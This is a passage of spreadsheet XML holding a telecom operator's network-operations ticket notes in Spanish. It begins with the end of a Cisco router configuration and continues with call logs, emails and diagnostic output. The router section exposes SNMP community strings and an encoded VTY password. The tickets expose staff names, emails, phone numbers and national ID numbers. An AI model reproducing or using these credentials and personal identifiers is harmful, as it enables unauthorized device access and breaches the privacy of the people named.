ACCESS-LIST 66 DENY   ANY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11 REMARK BLOQUEO-VIRUS
ACCESS-LIST 111 DENY   IP 127.0.0.0 0.255.255.255 ANY
ACCESS-LIST 111 DENY   IP ANY 127.0.0.0 0.255.255.255
ACCESS-LIST 111 DENY   IP 169.254.0.0 0.0.255.255 ANY
ACCESS-LIST 111 DENY   IP ANY 169.254.0.0 0.0.255.255
ACCESS-LIST 111 DENY   TCP ANY RANGE MSRPC 139 ANY
ACCESS-LIST 111 DENY   TCP ANY ANY RANGE MSRPC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SNMP-SERVER COMMUNITY ESCW2KPU RO 97
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
!
!
!
!
CONTROL-PLANE
!
BANNER LOGIN ^C
*********************************************************
*       ACCESO RESTRINGIDO / RESTRICTED ACCESS          *
* SOLO PERSONAL AUTORIZADO / AUTHORIZED PERSONNEL ONLY  *
* TODOS LOS ACCESOS SON MONITOREADOS / MONITORED ACCESS *
*********************************************************
^C
!
LINE CON 0
 AUTHORIZATION EXEC CON_ACC
 LOGIN AUTHENTICATION CON_ACC
 TRANSPORT INPUT NONE
 STOPBITS 1
LINE VTY 0 4
 ACCESS-CLASS 66 IN
 PASSWORD 7 01100F17580454
LINE VTY 5 15
 ACCESS-CLASS 98 IN
!
SCHEDULER INTERVAL 500
NTP SERVER 201.247.152.233 PREFER
NTP SERVER 201.247.152.249
!
!
!
!
!
END
ID1099135#</t>
  </si>
  <si>
    <t>F4598891</t>
  </si>
  <si>
    <t>***--- SE RECIBE CORREO DE CL AUTORIZANDO CIERRE DE SD ---**
DE: CRLAAMNOC MAILBOX [MAILTO:CRLAAMNOC_MAILBOX@DXC.COM]
ENVIADO EL: LUNES, 13 DE JUNIO DE 2022 04:53
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;
CC: GONZALEZ, JORGE ALEJANDRO &lt;J.GONZALEZ4@DXC.COM&gt;; CAMACHO SOTO, MARCO VINICIO &lt;M.CAMACHOSOTO@DXC.COM&gt;; MELENDEZ ALVAREZ, SOFIA &lt;S.MELENDEZALVAREZ@DXC.COM&gt;; MASIS, MAURICO &lt;MAURICO.MASIS@DXC.COM&gt;; GREGORIO MARROQUIN, RONY NOEL &lt;RONY-NOEL.GREGORIO-MARROQUIN@DXC.COM&gt;; KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; OCOX PIRIR, AXEL ANTONIO &lt;A.OCOXPIRIR@DXC.COM&gt;; GT EUFS ABVO &lt;GT_EUFS_ABVO@DXC.COM&gt;; PACHECO, JEAN CARLOS &lt;JEAN-CARLOS.PACHECO.PALACIOS@DXC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: INC23607104 | COCA COLA FEMSA-GUATEMALA-GUASTATOYA-DISTRIBUIDORA
BUENOS DIAS,
SERVICIO ACTIVO, SE PROCEDE AL CIERRE DE TICKET.
SALUDOS
ESTEBAN CESPEDES S.</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO PARA VALIDAR ---***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: LUNES, 13 DE JUNIO DE 2022 03:31
PARA: CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;
CC: GONZALEZ, JORGE ALEJANDRO &lt;J.GONZALEZ4@DXC.COM&gt;; CAMACHO SOTO, MARCO VINICIO &lt;M.CAMACHOSOTO@DXC.COM&gt;; MELENDEZ ALVAREZ, SOFIA &lt;S.MELENDEZALVAREZ@DXC.COM&gt;; MASIS, MAURICO &lt;MAURICO.MASIS@DXC.COM&gt;; GREGORIO MARROQUIN, RONY NOEL &lt;RONY-NOEL.GREGORIO-MARROQUIN@DXC.COM&gt;; KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; OCOX PIRIR, AXEL ANTONIO &lt;A.OCOXPIRIR@DXC.COM&gt;; GT EUFS ABVO &lt;GT_EUFS_ABVO@DXC.COM&gt;; PACHECO, JEAN CARLOS &lt;JEAN-CARLOS.PACHECO.PALACIOS@DXC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: INC23607104 | COCA COLA FEMSA-GUATEMALA-GUASTATOYA-DISTRIBUIDORA
BUENOS DÍAS ESTIMADOS DXC.
                PODRÍAN APOYARNOS EN VALIDAR EL FUNCIONAMIENTO E INDICARNOS SI PODRÍAMOS CERRAR NUESTRO TICKET.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4598912</t>
  </si>
  <si>
    <t>ENLCE ACTIVO S EDETIENEN ESCALACIONES, TECNICO CORRIGE CONEXIONES EN CLIENTE</t>
  </si>
  <si>
    <t>TECNICO ASIGNAD O FREDY MARTINEZ RODRGUEZ</t>
  </si>
  <si>
    <t>TECNICO LLEGANDO A SITIO PIDE SE LE MARQUE NUEVAMENTE EN 20 MINUTOS</t>
  </si>
  <si>
    <t>TABLA DE ESCALAMIENTO PLANTA EXTERNA REGION CENTRAL				07:0
	WO OPEN                        			10:28
1/4	MIGUEL ANGEL CALDERON	58261558	2 HORAS	12:28:00
2/4	MIGUEL ANGEL CALDERON	58261558	3 HORAS	13:28:00
3/4	RENE AGUSTIN	58261183	5 HORAS	15:28:00
4/4	RODOLFO MORALES	58261609	6 HORAS	16:28:00</t>
  </si>
  <si>
    <t>F4598920</t>
  </si>
  <si>
    <t>-* GERSON (CLIENTE) INFORMA QUE CONTINUAN SIN SERVICIO, REALIZA TRIPARTITA CON RUDY  EN PR, TIENE ACCESO A LOS EQUIPOS POR LO QUE SE DEJA EN CONFERENCIA CON JHONSSER ESCOBAR (GESTOR) PARA VALIDACIONES Y/O PRUEBAS -*
-*</t>
  </si>
  <si>
    <t>F4598922</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL PARA VALIDAR --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: LUNES, 13 DE JUNIO DE 2022 03:45
PARA: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
CC: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; NOE PEREZ (VENDOR) &lt;NOE.PEREZ1@WALMART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE PALI OROSI ID: CONTR0001888650OC
BUENOS DÍAS ESTIMADOS SEÑORES CAM.
                PODRÍAN APOYARNOS EN VALIDAR EL FUNCIONAMIENTO DEL SERVICIO E INDICARON SI PODRÍAMOS CERRAR NUESTRO TICKET.
EL SERVICIO SE MANTUVO EN MONITOREO A SOLICITUD EL SR. DIEGO LUEGO DE NUESTRAS REVISIONES DONDE NO OBSERVAMOS ALGÚN EVENTO DENTRO DE NUESTRA RED.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4598978</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, A LA ESPERA DE LA RESPUESTA.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: LUNES, 13 DE JUNIO DE 2022 11:30
PARA: SERVICIOS5B@5B.COM.GT &lt;SERVICIOS5B@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;
CC: FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: ALARMA DEL SITIO: CC_TYT_GT_ATM3998
ESTIMADO CLIENTE,
SOLICITAMOS SU APOYO CON ENVIAR SUPERVISOR AL CAJERO PARA QUE SE VALIDE LOS EQUIPOS Y CONEXIONES DEL ENLACE PRINCIPAL, YA QUE ACTUALMENTE EN EL MONITOREO SE DETECTA QUE NO SE TIENE NADA CONECTADO A LA INTERFAZ CORRESPONDIENTE DEL ROUTER. ENLACE ÚNICAMENTE OPERATIVO POR 3G.
INTERFACE            OPERSTATUS
ETHERNET0/0          UP
ETHERNET0/1          DOWN
ETHERNET0/2          DOWN
ATM0/0               DOWN
CELLULAR1/0          UP
CELLULAR1/1          UP
PPP10                UP
TNIP10               UP
TNIP20               UP
LOOPBACK5            UP
TICKET: F4598978
ID: 47502553T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM3998
UBICADO EN: CAJERO 3998 FARMACIA SOCIAL COMUNITARIA, 23 C. 4-96 Z.12 LOC.D VILLA LOBOS 1 VILLA NUEVA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4599025</t>
  </si>
  <si>
    <t>*/*/*/SE COMUNICA HEIDI RUIZ PARA SOLICITAR AVANCES, SE VERIFICA QUE F4599025 ESTA EN PC PARA VERIFICAR EQUIPOS, SE REALIZA CONFERENCIA CLIENTE/GESTOR JOSE.ARIAS PARA PROCEDER*/*/*/</t>
  </si>
  <si>
    <t>F4599049</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001099865</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 14:53
PARA: GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; DIEGO MORA (VENDOR) &lt;LUIS.D.MORA@WALMART.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; JEFFERSON ARCE (VENDOR) &lt;JEFFERSON.ARCE@WALMART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE INESTABLE DE DF SANTA ROSA DE COPAN ID: 594555
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE HABLÓ CON MALAQUÍAS PANJOJ/CLIENTE 2243-7253 INDICA ENLACE OK, PIDE MONITOREO PARA MAÑANA A LAS 07:00AM</t>
  </si>
  <si>
    <t>F4599079</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR TECUN - 37610279 MENCIONA QUE PRESENTARON INESTABILIDAD CON EL SERVICIO EL JUEVES 9 EN LA MAÑANA HASTA LAS 11:00 HRS CLIENTE SOLICITA SABEER EL MOTIVO DE LA INTERMITENCIA PORQUE ACTUALMENTE ESTAN TRABAJANDO BAJO EL SERVICIO REDUNDANTE F4598358
-ID 2001935805</t>
  </si>
  <si>
    <t>F4599105</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 00525551745290 CONTESTA LA SEÑORITA LAURA RODRIGUEZ CONFIRMA QUE YA ESTA CERRADO DE SU LADO QUE SE PUEDE PROCEDER AL CIERRE **
-ID 2001866312
**</t>
  </si>
  <si>
    <t>F4599114</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JHONNY EDGAR PINEDA 24202911 NO RESPONDEN, SE INTENTARA LUEGO
-ID 2001790509</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JHONNY EDGAR PINEDA 24202911 NO RESPONDEN, OPERADORA INDICA QUE NO HAY OPERADORES DISPONIBLE || SE INTENTARA LUEGO**
-ID 2001821663
**</t>
  </si>
  <si>
    <t>** SE LLAMA A CLIENTE JHONNY EDGAR PINEDA SANTOS   AL  24202911  NO RESPONDE SE INTENTARA LUEGO **
ID 2001785142
**</t>
  </si>
  <si>
    <t>SE DEVUELVE LA LLAMADA A CLIENTE, RESPONDE KIMBERLY, QUIEN INDICA QUE NO SE LOGRA RESPUESTA DEBIDO A QUE SE ENCUENTRAN EN REUNION, LA CUAL ESTA PROGRAMADA HASTA LAS 16:00 HORAS,  SUGIERE QUE SE LE MARQUE DESPUES DEL HORARIO MENCIONADO PARA VALIDAR EL SERVICIO O SE LE ENVIE CORREO.
2001853622
COLA:
NOMBRE: A: 24202911
NÚMERO: 24202911
DURACIÓN: 0:01:43
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24202911
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 13/06/2022 11:12:00</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE, CONTESTA KIMBERLY, TRANFIERE LLAMADA A JHONY, PERO NO HAY RESPUESTA,SE INTENTAR LUEGO
2001852289
COLA:
NOMBRE: A: 24202911
NÚMERO: 24202911
DURACIÓN: 0:02:43
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 24202911
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 13/06/2022 11:09:08</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SE QUEDA A ESPERA DE RESPUESTA
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 11:22
PARA: JHONY_PINEDA@UNICOMER.COM &lt;JHONY_PINEDA@UNICOMER.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: UNION COMERCIAL DE GUATEMALA, SOCIEDAD ANONIMA | 12700093T | SD1134421
BUENOS DÍAS, JHONNY.
COMO PARTE DEL SEGUIMIENTO AL CASO, SE OBSERVA DE NUESTRA PARTE ENLACE OPERATIVO, LLEGANDO SIN PÉRDIDA DE PAQUETES A LA IP WAN DE PUNTO REMOTO.
¿SERVICIO A NIVEL WAN SE OBSERVAN OPERATIVO Y ESTABLE
 ¿CAPTURA ARP, DONDE SE VALIDAN EQUIPOS DEL CLIENTE ASOCIADOS.
QUEDAREMOS ATENTOS A SUS COMENTARIOS PARA PODER PROCEDER AL CIERRE DEL CASO YA QUE POR PARTE DE CLARO NO HAY ACCIONES QUE REALIZAR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JHONNY EDGAR PINEDA 24202911 NO RESPONDEN, SE INTENTARA LUEGO**
-ID 2001800580
**</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE INDICANDO QUE YA OBSERVA EL SERVICIO ESTABLE
DE: JHONNY EDGAR PINEDA SANTOS &lt;JHONY_PINEDA@UNICOMER.COM&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 11:24
PARA: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; HD UNIC GT &lt;HD_GT@UNICOMER.COM&gt;
ASUNTO: RE: UNION COMERCIAL DE GUATEMALA, SOCIEDAD ANONIMA | 12700093T | SD1134421
MUCHAS GRACIAS POR SU SEGUIMIENTO ESTIMADOS, LES COMENTO QUE YA LO VEMOS ESTABLE.
SALUDOS CORDIALES.
JHONNY PINEDA
HELPDESK
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4599144</t>
  </si>
  <si>
    <t xml:space="preserve">
ENLACE CONTINUA CAIDO, SE CONSULTA A PERSONAL DE BANCO AZTECA SOBRE EL ESTADO DE LA AGE
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN ELEKTRADATOS 10.72.102.108
  PING 10.72.102.108: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.102.108 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.6
DISPLAY IP ROUTING-TABLE VPN-INSTANCE ELEKTRADATOS 10.72.102.108
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : ELEKTRADATOS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.72.102.96/28  DIRECT  0    0             D   10.72.102.97    VLANIF339			</t>
  </si>
  <si>
    <t>F4599149</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: DOMINGO, 12 DE JUNIO DE 2022 17:51
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; TIC ORELLANA, FRANKLIN &lt;FRANKLIN.ORELLANA@BANRURAL.COM.GT&gt;; TIC - DIRECCION DE TELECOMUNICACIONES (LISTA) &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SERIVICO DOWN, ID 8901233 AGENCIA 697 ¿ SANYUYO
BUENAS TARDES ESTIMADOS (A)
COMO PARTE DEL SEGUIMIENTO AL CASO SOLICITAMOS DE SU AMABLE APOYO PARA VALIDAR SI AÚN PERSISTEN LOS INCONVENIENTES PLANTEADOS. ENLACE SE OBSERVA ALCANZABLE A NIVEL DE PING. SE VALIDA UN REINICIO EN EL WIMAX DE INSTALACIONES HACE POCO MÁS DE 40 MINUTOS. SALUDOS CORDIALES. GRACIAS.</t>
  </si>
  <si>
    <t>F4599150</t>
  </si>
  <si>
    <t>*** SE ENVÍA CORREO NUEVAMENTE A CLIENTE, A LA ESPERA DE QUE PUEDA CONFIRMAR DE AUTORIZADOS LOS ACCESOS ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: MARTES, 14 DE JUNIO DE 2022 8:45
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; RODRIGUEZ HERNANDEZ LAURA LILIA &lt;RHERNANL@UNINET.COM.MX&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; SÁNCHEZ MEJÍA LESLIE DENISS &lt;LSMEJIA@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL MP231101082S ### ::: TICKET CNOC IMDHE020572### ::: "CAMBIO DE EQUIPO ROUTER"
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, FAVOR DE SU APOYO EN PODER CONFIRMAR LA AUTORIZACIÓN DE ACCESOS PARA EL PERSONAL QUE SE ESTARÁ HACIENDO PRESENTE EL DÍA DE MAÑANA PARA LA SOLICITUD DE CAMBIO DE EQUIPO.
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>*** SE ENVÍAN DATOS DE PERSONAL TÉCNICO A CLIENTE, A LA ESPERA DE CONFIRMACIÓN DE ACCESOS ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 8:21
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; RODRIGUEZ HERNANDEZ LAURA LILIA &lt;RHERNANL@UNINET.COM.MX&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; SÁNCHEZ MEJÍA LESLIE DENISS &lt;LSMEJIA@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL MP231101082S ### ::: TICKET CNOC IMDHE020572### ::: "CAMBIO DE EQUIPO ROUTER"
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, SE HA GENERADO UNA VISITA TÉCNICA, POR LO QUE SE REQUIERE DE SU APOYO EN LA GESTIÓN Y AUTORIZACIÓN DE ACCESOS PARA EL PERSONAL QUE SE DESCRIBE A CONTINUACIÓN, PARA LA VISITA EL DÍA MIÉRCOLES 15 DE JUNIO A LAS 9H:
DUI              CODIGO            EMPLEADO
00936126-7 4799            MARIO ERNESTO CRUZ MARQUEZ
00354722-1 4378            RONAL MOREL CRESPIN
00157708-4 4690            ABRAHAM SAMUEL PEREZ
03245714-4 8787           ADAN ERNESTO GONZALEZ
01968544-3 9407           WALTER ERNESTO RODRIGUEZ PEREZ
01101266-2 4605           JOSE SALVADOR PORTILLO VELASQUEZ
04086816-7 12404        GERARDO ANTONIO MINERO
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL  52 55 5174 5290 CONTESTA EL SEÑOR OSWALDO INFORMA QUE SI CUENTAN YA CON LOS ACCESOS Y QUIEN VA A RECIBIR SERA JHONATAN CL ENVIO CORREO YA CON LA CONFIRMACION**
-ID 3001075072
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA EL SEÑOR MONSERRAT GARRIDO INDICA QUE AUN NO CUENTAN CON LOS ACCESOS QUE CUANDO LOS TENGAN NOS ESTARAN INFORMANDO **
-ID 3001027103
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA LA SEÑORITA LAURA RODRIGUEZ QUIEN INDICA QUE ESTARA ENVIANDO EL CORREO AL CLIENTE FINAL Y NOS ESTARAN RESPONDIENDO CORREO Y EL NOMBRE DE LA PERSONA QUE ATENDERA EN SITIO **
-ID 2001793680
**
**</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL ---**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: LUNES, 13 DE JUNIO DE 2022 01:23
PARA: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; SÁNCHEZ MEJÍA LESLIE DENISS &lt;LSMEJIA@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL MP231101082S ### ::: TICKET CNOC IMDHE020572### ::: "CAMBIO DE EQUIPO ROUTER"
BUENOS DÍAS ESTIMADOS CNOC INTL.
                PODRÍAN APOYARNOS INDICANDO SI SE CUENTA CON ALGÚN AVANCES DE LA SOLICITUD QUE ANTECEDE.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4599217</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL RESPONDIENDO SOBRE LO REALIZADO -***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: LUNES, 13 DE JUNIO DE 2022 01:44
PARA: NOE PEREZ (VENDOR) &lt;NOE.PEREZ1@WALMART.COM&gt;; JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; JURGEN RENE BOCH CAAL &lt;JURGEN.BOCH@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE PALI BARRIO CORAZON DE JESUS ID: CONTR0001852703OC
BUENOS DÍAS ESTIMADO SR. PEREZ.
                ACTUALMENTE EL SERVICIO SE ENCUENTRA EN MONITOREO HASTA LAS 07:00 HRS A SOLICITUD DEL SR. MALAQUIAS.
NUESTRO PERSONAL TÉCNICO REALIZO REPARACIÓN DE 1 HILO DE FIBRA.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: NOE PEREZ (VENDOR) [MAILTO:NOE.PEREZ1@WALMART.COM]
ENVIADO EL: LUNES, 13 DE JUNIO DE 2022 01:38
PARA: JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; JURGEN RENE BOCH CAAL &lt;JURGEN.BOCH@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE PALI BARRIO CORAZON DE JESUS ID: CONTR0001852703OC
BUENOS DÍAS ,
FAVOR NOS PODRÍAN HACER FAVOR DE DARNOS EL UPDATE SOBRE ESTA CASO
SALUDOS</t>
  </si>
  <si>
    <t>F4599412</t>
  </si>
  <si>
    <t>***---   MALAQUIAS PANJOJ 22437253 (CLIENTE) SOLICITA MONITOREO PARA HOY A LAS 07:00 HRS *---*-
2001771890</t>
  </si>
  <si>
    <t>F4599457</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JAIRO MEDINA AL 55668592 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001823625
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JAIRO MEDINA AL 55668592 Y BRINDA LOS SIGUIENTES DATOS PARA LA VISITA**
HORARIO DE ATENCION: 6:30 AM A 15:00 PM
GESTION DE PERMISOS: SOLO IDENTIFICADOS.
DIRECCION: CALZ. ROOSEVELTH 13-35 ZONA 1 MIXCO ALDEA LO DE COY
ATENDERA EN SITIO: JAIRO MEDINA
-ID 2001785897
**</t>
  </si>
  <si>
    <t>F4599468</t>
  </si>
  <si>
    <t>SERVICIO OPERATIVO Y ESTABLE A NIVEL DE CLARO.  SE HABLO CON CLIENTE JOAQUIN TORREZ 77630030,  CALL ID: 2001786251,  QUIEN SOLICITO UN CORREO CON LAS PRUEBAS REALIZADAS, SE ENVIO DICHO CORREO CON COPIA A NOC NICARAGUA.
ASUNTO: 3702492 || PROGRAMA MUNDIAL DE ALIMENTO (P.M.A.)
JURGEN RENE BOCH CAAL
BUEN DÍA,
